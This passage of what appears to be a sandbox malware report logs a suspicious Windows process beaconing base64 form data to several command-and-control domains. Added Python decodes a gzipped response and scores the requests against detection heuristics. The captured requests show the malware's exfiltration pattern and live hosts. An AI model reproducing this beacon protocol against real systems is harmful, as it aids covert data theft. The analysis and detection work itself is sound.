                                                       Aug 18, 2024 18:25:45.996210098 CEST | 440 | OUT | GET /8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                       Aug 18, 2024 18:25:46.635668039 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 2247
                                                      date: Sun, 18 Aug 2024 16:25:46 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><meta name="Author" content="dhosting.pl" /><meta name="Copyright" content="dhosting.pl" /><meta name="Language" content="pl" /><meta name="Robots" content="index, follow" /><title>dhosting.pl - pod tym adresem nie znajduje si aden serwis WWW</title><style type="text/css">a:link, a:visited{font: 12px verdana, sans-serif;color:#333;text-decoration:none;}img{border:0px;}a:hover, a:active{color:#000;text-decoration:underline;}#tresc{font: 12px verdana, sans-serif;color: #333;}#foot{font: 10px verdana, sans-serif;color:#606060;text-align:center;position:absolute;bottom:5px;width:99%;}.f:link, .f:visited{font-size:10px;font-weight: bold;font-family: verdana, sans-ser [TRUNCATED]
                                                       Aug 18, 2024 18:25:46.635730982 CEST | 1200 | IN | Data Raw: 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 66 3a 68 6f 76 65 72 2c 20 2e 66 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 32 30 32 30 32 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d
                                                      Data Ascii: n:none;}.f:hover, .f:active{color:#202020;text-decoration:underline;}</style></head><body><div style="text-align:center;"><a href="https://dhosting.pl" rel="nofollow"><img src="https://dhosting.pl/img/logo.svg" alt="dho


                                                       Session ID: 17 | Source IP: 192.168.2.9 | Source Port: 54127 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:25:51.675002098 CEST | 704 | OUT | POST /7ie4/ HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.alanbeanart.com
                                                      Referer: http://www.alanbeanart.com/7ie4/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 6c 34 64 67 64 45 39 43 72 5a 64 30 4b 6f 6a 44 79 79 78 53 67 73 51 48 49 41 4c 6c 4c 5a 79 73 2b 78 6f 47 65 61 6b 4d 35 56 65 2b 75 50 59 64 51 54 67 4b 48 79 41 41 63 6a 71 69 43 4f 52 63 62 61 68 49 77 64 45 7a 30 4e 64 53 76 72 37 4f 36 4e 44 53 43 6f 54 58 6d 39 72 41 70 73 76 34 79 36 75 42 65 61 52 65 32 6a 77 7a 46 6f 78 67 6f 71 57 4a 6e 37 36 78 59 33 38 48 30 58 51 6a 68 5a 66 53 2f 71 6c 4a 42 53 4b 39 46 56 43 31 33 72 65 34 45 46 66 63 42 66 6d 63 6d 43 48 51 5a 6f 66 70 38 44 67 68 37 61 2b 4b 42 50 33
                                                      Data Ascii: dZo=QWuY90GonuIzDl4dgdE9CrZd0KojDyyxSgsQHIALlLZys+xoGeakM5Ve+uPYdQTgKHyAAcjqiCORcbahIwdEz0NdSvr7O6NDSCoTXm9rApsv4y6uBeaRe2jwzFoxgoqWJn76xY38H0XQjhZfS/qlJBSK9FVC13re4EFfcBfmcmCHQZofp8Dgh7a+KBP3


                                                       Session ID: 18 | Source IP: 192.168.2.9 | Source Port: 54128 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:25:54.216761112 CEST | 728 | OUT | POST /7ie4/ HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.alanbeanart.com
                                                      Referer: http://www.alanbeanart.com/7ie4/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 39 79 74 63 5a 6f 48 62 75 6b 50 35 56 65 71 2b 4f 51 41 41 54 72 4b 48 2b 2b 41 65 6e 71 69 43 61 52 63 65 6d 68 4a 48 70 4c 7a 6b 4e 62 59 2f 72 35 41 61 4e 44 53 43 6f 54 58 6e 59 4f 41 71 63 76 34 48 79 75 48 2f 61 53 41 6d 6a 7a 30 46 6f 78 6b 6f 71 61 4a 6e 36 70 78 5a 62 61 48 32 76 51 6a 68 4a 66 56 74 53 6d 44 42 53 4d 69 56 55 75 30 46 2f 58 35 7a 64 67 55 79 72 30 4d 31 53 76 65 59 49 42 34 4f 4b 37 30 73 61 5a 4e 6d 47 66 44 69 42 2b 47 75 49 59 77 78 30 62 48 63 35 6b 34 65 72 59 2f 67 3d 3d
                                                      Data Ascii: dZo=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY9ytcZoHbukP5Veq+OQAATrKH++AenqiCaRcemhJHpLzkNbY/r5AaNDSCoTXnYOAqcv4HyuH/aSAmjz0FoxkoqaJn6pxZbaH2vQjhJfVtSmDBSMiVUu0F/X5zdgUyr0M1SveYIB4OK70saZNmGfDiB+GuIYwx0bHc5k4erY/g==


                                                       Session ID: 19 | Source IP: 192.168.2.9 | Source Port: 54129 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:25:56.946115971 CEST | 1741 | OUT | POST /7ie4/ HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.alanbeanart.com
                                                      Referer: http://www.alanbeanart.com/7ie4/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 31 79 73 76 68 6f 47 34 32 6b 4f 35 56 65 32 4f 4f 52 41 41 54 79 4b 45 4f 36 41 65 37 36 69 48 65 52 63 37 71 68 63 46 42 4c 34 6b 4e 62 57 76 72 38 4f 36 4e 57 53 44 45 58 58 6d 6f 4f 41 71 63 76 34 41 43 75 48 75 61 53 43 6d 6a 77 7a 46 6f 48 67 6f 72 50 4a 6e 69 35 78 5a 66 73 47 47 50 51 6a 46 56 66 51 59 2b 6d 65 52 53 4f 68 56 55 32 30 46 69 50 35 33 31 47 55 7a 66 53 4d 31 61 76 64 74 56 61 6f 76 2b 76 31 2f 66 78 50 31 71 61 44 69 4e 5a 50 64 31 2f 69 6a 45 75 54 76 55 57 36 50 4b 49 2f 67 4e 36 39 47 54 50 7a 69 6f 69 4c 34 70 4d 4a 65 74 72 72 6d 43 62 68 62 52 46 6d 32 6f 65 34 53 34 63 2b 31 73 34 5a 58 64 6d 52 4e 6e 4b 36 4a 4a 77 66 59 36 58 4a 77 7a 36 55 76 30 69 72 6c 32 74 6b 45 2b 56 4a 6a 65 43 64 31 73 35 50 46 76 59 6b 64 75 37 51 7a 4d 58 48 4b 44 51 33 6c 61 44 74 34 78 6d 71 73 62 63 6c 41 6b 52 6c 73 34 6c 2b 79 37 6b 6c 2b 4e 2b 58 56 [TRUNCATED]
                                                       Data Ascii: dZo= [TRUNCATED]


                                                       Session ID: 20 | Source IP: 192.168.2.9 | Source Port: 54130 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:00.052233934 CEST | 441 | OUT | GET /7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                       Aug 18, 2024 18:26:03.453802109 CEST | 394 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:03 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 5a 6f 3d 64 55 47 34 2b 44 44 64 70 2f 73 6a 44 6c 6f 55 70 63 31 50 61 39 6f 7a 33 72 63 70 63 43 4b 32 58 69 4d 69 4f 5a 6b 44 34 34 46 53 6a 4c 31 42 55 4a 43 30 42 37 5a 62 39 70 43 6d 65 43 66 56 58 6b 6d 41 46 76 50 50 6f 67 47 52 52 6f 69 76 4b 56 68 4c 6c 6e 52 38 57 2b 44 51 49 62 4e 6f 51 32 6b 6e 65 56 68 6e 4f 4a 67 30 35 44 37 30 63 67 3d 3d 26 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                       Session ID: 21 | Source IP: 192.168.2.9 | Source Port: 54131 | Destination IP: 64.226.69.42 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:08.505729914 CEST | 692 | OUT | POST /rdfm/ HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.kacotae.com
                                                      Referer: http://www.kacotae.com/rdfm/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 31 44 62 42 62 42 4e 31 47 4e 44 72 62 35 59 55 6f 7a 31 38 56 56 67 42 4d 64 70 45 2b 5a 65 67 42 49 46 4a 4b 4a 47 64 58 46 65 6b 42 6f 6a 30 51 79 33 74 36 47 33 62 32 4c 48 52 6f 43 71 72 2f 47 36 52 6b 6d 63 73 52 30 5a 4a 4d 73 66 36 37 48 52 57 30 75 51 32 55 61 54 79 67 77 32 49 37 54 39 4f 6a 35 33 4d 76 4e 55 76 45 64 69 7a 63 4f 2f 56 6a 58 68 67 36 43 2f 2b 41 74 67 57 30 42 31 58 5a 63 4f 6a 75 61 5a 56 35 31 38 63 52 74 58 68 72 42 4a 69 6d 4b 6c 6e 47 72 42 51 6f 44 57 48 6c 39 63 6a 62 50 59 4a 37 62 4e 77
                                                      Data Ascii: dZo=9pMmvcz73uDu1DbBbBN1GNDrb5YUoz18VVgBMdpE+ZegBIFJKJGdXFekBoj0Qy3t6G3b2LHRoCqr/G6RkmcsR0ZJMsf67HRW0uQ2UaTygw2I7T9Oj53MvNUvEdizcO/VjXhg6C/+AtgW0B1XZcOjuaZV518cRtXhrBJimKlnGrBQoDWHl9cjbPYJ7bNw
                                                       Aug 18, 2024 18:26:09.343399048 CEST | 361 | IN | HTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:09 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
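The kacotae.com 404 body in the session above is sent chunked and gzip-compressed, which is why the report's "Data Ascii" rendering of it is unreadable; the "Data Raw" line, however, is complete (no [TRUNCATED] marker). The following Python is an added example, not part of the Joe Sandbox report: it takes that hex dump verbatim, strips the HTTP/1.1 chunk framing, reads the size recorded in the gzip trailer, and then decompresses the stream. The constant `KACOTAE_404_BODY_HEX` is copied from the Data Raw line; the function names are mine.

```python
import gzip
import struct

# Copied verbatim from the "Data Raw" line of the kacotae.com 404 response above:
# "ac\r\n" (one chunk of 0xac = 172 bytes), the gzip stream, then the zero-size
# terminating chunk "0\r\n\r\n".
KACOTAE_404_BODY_HEX = """
61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20
44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72
67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa
2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81
92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d
1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f
11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
"""


def dechunk(data):
    """Split an HTTP/1.1 chunked body into its chunks, stopping at the zero-size chunk.

    Raises ValueError on a truncated body or a chunk that is not CRLF-terminated,
    which is what you want when the sandbox capture was cut short.
    """
    chunks = []
    pos = 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("truncated chunked body: no chunk-size line")
        size_field = data[pos:end].split(b";", 1)[0]   # ignore chunk extensions
        size = int(size_field, 16)
        pos = end + 2
        if size == 0:
            return chunks                                # trailers, if any, are ignored
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunked body: short chunk")
        chunks.append(chunk)
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk not terminated by CRLF")
        pos += 2


def gzip_isize(stream):
    """Uncompressed length recorded in the gzip trailer (ISIZE, little-endian, mod 2**32)."""
    if stream[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    return struct.unpack("<I", stream[-4:])[0]


def decode_body(hex_dump):
    """Hex dump of a chunked+gzip response body -> the decompressed bytes."""
    raw = bytes.fromhex(hex_dump)                  # fromhex skips the whitespace/newlines
    stream = b"".join(dechunk(raw))
    return gzip.decompress(stream)                 # also verifies the CRC32 and ISIZE


if __name__ == "__main__":
    body = decode_body(KACOTAE_404_BODY_HEX)
    print(len(body), "bytes:")
    print(body.decode("utf-8", errors="replace"))
```

The trailer says the page is 552 bytes uncompressed; `gzip.decompress` re-checks both the CRC32 and that length, so a single mistyped byte in the dump fails loudly instead of producing plausible-looking garbage. The same routine does not help with the synergon.space 404s, which are Brotli-compressed (`content-encoding: br`) and truncated in the report.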


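Across sessions 13 to 22 the same process (PID 1808, XraVxjqYYo.exe) walks three hosts (www.synergon.space, www.alanbeanart.com, www.kacotae.com) and sends each of them the same sequence: POSTs of 192, 216 and 1228 bytes to a short single-segment path (/8unq/, /7ie4/, /rdfm/), each body a single form field `dZo=` holding raw base64, then a GET with the same field plus `gta=` in the query string. Every request carries the same fixed User-Agent, and the Origin and Referer headers simply point back at the host being posted to. The hosts answer with a 404 or a hosting placeholder, so a 404 from the server says nothing about whether the client side is malicious. The Python below is an added example, not part of the Joe Sandbox report and not a FormBook signature from it: it rebuilds the requests above from the values shown in the capture (a helper reproduces the header layout; the two 1228-byte bodies are truncated on the page, so only their visible prefix is used), scores each request against the traits listed, and groups hosts that received an identical POST-length sequence. The trait names, the path and base64 regexes, and the thresholds are assumptions of mine.

```python
import re
from collections import defaultdict

# User-Agent string carried by every request in the captured sessions.
CAPTURE_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 "
              "(KHTML, like Gecko) Chrome/42.0 Safari/537.31")
SHORT_PATH = re.compile(r"^/[a-z0-9]{3,5}/$")     # /8unq/, /7ie4/, /rdfm/ (my heuristic)
RAW_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # base64 that was never percent-encoded


def build_request(method, host, path, body="", length=None, query="", ua=CAPTURE_UA):
    """Rebuild a request in the header layout of the capture (constructed sample input)."""
    target = path + ("?" + query if query else "")
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}",
             "Accept-Language: en-US,en", "Connection: close", f"User-Agent: {ua}"]
    if method == "POST":
        lines += [f"Origin: http://{host}", f"Referer: http://{host}{path}",
                  f"Content-Length: {len(body) if length is None else length}",
                  "Content-Type: application/x-www-form-urlencoded"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query, "body": body,
            "host": headers.get("host", ""), "headers": headers,
            "content_length": int(headers.get("content-length", "0"))}


def flag_request(raw):
    """Traits of one request that match the beaconing seen in the capture; [] if none."""
    req = parse_request(raw)
    hdr, host, path = req["headers"], req["host"], req["path"]
    hits = []
    if hdr.get("user-agent") == CAPTURE_UA:
        hits.append("static-ua")
    if SHORT_PATH.match(path):
        hits.append("short-path")
    if req["method"] == "POST":
        key, _, value = req["body"].partition("=")
        if "&" not in req["body"] and key.isalnum() and RAW_B64.match(value):
            hits.append("single-b64-field")
        if "+" in value or "/" in value:
            # a browser submitting a real form would have sent %2B and %2F here
            hits.append("unencoded-b64")
        if hdr.get("origin") == f"http://{host}" and hdr.get("referer") == f"http://{host}{path}":
            hits.append("self-referer")
    elif req["method"] == "GET" and req["query"]:
        first, _, rest = req["query"].partition("&")
        _key, _, value = first.partition("=")
        if rest and RAW_B64.match(value):
            hits.append("b64-query")
    return hits


def hosts_sharing_post_sequence(raws):
    """Group hosts by the exact sequence of POST Content-Length values each received."""
    seq_by_host = defaultdict(list)
    for raw in raws:
        req = parse_request(raw)
        if req["method"] == "POST":
            seq_by_host[req["host"]].append(req["content_length"])
    hosts_by_seq = defaultdict(list)
    for host, seq in seq_by_host.items():
        hosts_by_seq[tuple(seq)].append(host)
    return {seq: hosts for seq, hosts in hosts_by_seq.items() if len(hosts) > 1}


# Rebuilt from the sessions above; bodies are the dZo= values printed in the report.
SAMPLES = [
    build_request("POST", "www.synergon.space", "/8unq/", "dZo=cmHr04oQ6fWhPKYZRKonoMZnWz/mCJKI5sYe864gX0Kke1N+i0b2l8NuWagqK+lLWhgR8huGFYJyMJQCwwKz5T06+oCzWExCov1PgXAr+JsbF63mK8Its4wpUY86RdK+5xH/NHePKUxTlLRC6hSjDrCsTtqS6WBulhJe4ACoLvl+Nirvr61WrAhHvlee", 192),
    build_request("POST", "www.synergon.space", "/8unq/", "dZo=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXHikfVd+wx72k8Nud6grEelQWhls8g+GFZtyMIgCwBKwrT04l4CxYkxCov1PgXVw+NAbEJvmJZ8ulYwqCI86HdL15xHRNCHYKR1TlLBC+kygKrCqf9rQ+ks99DN0wDCZZ+lODjLx6I8N+XhgoCX2xOyk4q5+22wCggp5IGA+ow==", 216),
    build_request("POST", "www.synergon.space", "/8unq/", "dZo=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXB6kfjR+zXz2j8Nu", 1228),  # prefix only
    build_request("GET", "www.synergon.space", "/8unq/", query="dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8"),
    build_request("POST", "www.alanbeanart.com", "/7ie4/", "dZo=QWuY90GonuIzDl4dgdE9CrZd0KojDyyxSgsQHIALlLZys+xoGeakM5Ve+uPYdQTgKHyAAcjqiCORcbahIwdEz0NdSvr7O6NDSCoTXm9rApsv4y6uBeaRe2jwzFoxgoqWJn76xY38H0XQjhZfS/qlJBSK9FVC13re4EFfcBfmcmCHQZofp8Dgh7a+KBP3", 192),
    build_request("POST", "www.alanbeanart.com", "/7ie4/", "dZo=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY9ytcZoHbukP5Veq+OQAATrKH++AenqiCaRcemhJHpLzkNbY/r5AaNDSCoTXnYOAqcv4HyuH/aSAmjz0FoxkoqaJn6pxZbaH2vQjhJfVtSmDBSMiVUu0F/X5zdgUyr0M1SveYIB4OK70saZNmGfDiB+GuIYwx0bHc5k4erY/g==", 216),
    build_request("POST", "www.alanbeanart.com", "/7ie4/", "dZo=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY1ysvhoG42kO5Ve", 1228),  # prefix only
    build_request("GET", "www.alanbeanart.com", "/7ie4/", query="dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8"),
    build_request("POST", "www.kacotae.com", "/rdfm/", "dZo=9pMmvcz73uDu1DbBbBN1GNDrb5YUoz18VVgBMdpE+ZegBIFJKJGdXFekBoj0Qy3t6G3b2LHRoCqr/G6RkmcsR0ZJMsf67HRW0uQ2UaTygw2I7T9Oj53MvNUvEdizcO/VjXhg6C/+AtgW0B1XZcOjuaZV518cRtXhrBJimKlnGrBQoDWHl9cjbPYJ7bNw", 192),
    build_request("POST", "www.kacotae.com", "/rdfm/", "dZo=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/q2gCp1JLIGdWFekPIj7Ni3k6G7l2K7RoC+r/EyRkRIrXkZHUcf41nRW0uQ2UaWZgweI4jtOhY3TjtUsDdizNe/JjXhW6DipAvoW0BlXYJiskaZT0V9TbO+NzzE/la9Sc9VTiC2Z0PV4OYYu88EYdMx5Y2G2JzpXI+hHPBloog==", 216),
]

if __name__ == "__main__":
    for raw in SAMPLES:
        req = parse_request(raw)
        print(req["method"], req["host"], req["path"], req["content_length"], flag_request(raw))
    print(hosts_sharing_post_sequence(SAMPLES))
```

Two of the traits are worth more than the others when writing a rule. A genuine browser form submission percent-encodes `+` and `/` in an `application/x-www-form-urlencoded` body, so raw base64 in the value means the client built the body itself. And the identical 192/216/1228-byte POST sequence replayed against unrelated hosts is a property of the sender, not of any one domain, so a detection keyed on the length sequence per source process survives the domain rotation that a per-hostname blocklist does not.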
                                                       Session ID: 22 | Source IP: 192.168.2.9 | Source Port: 54132 | Destination IP: 64.226.69.42 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
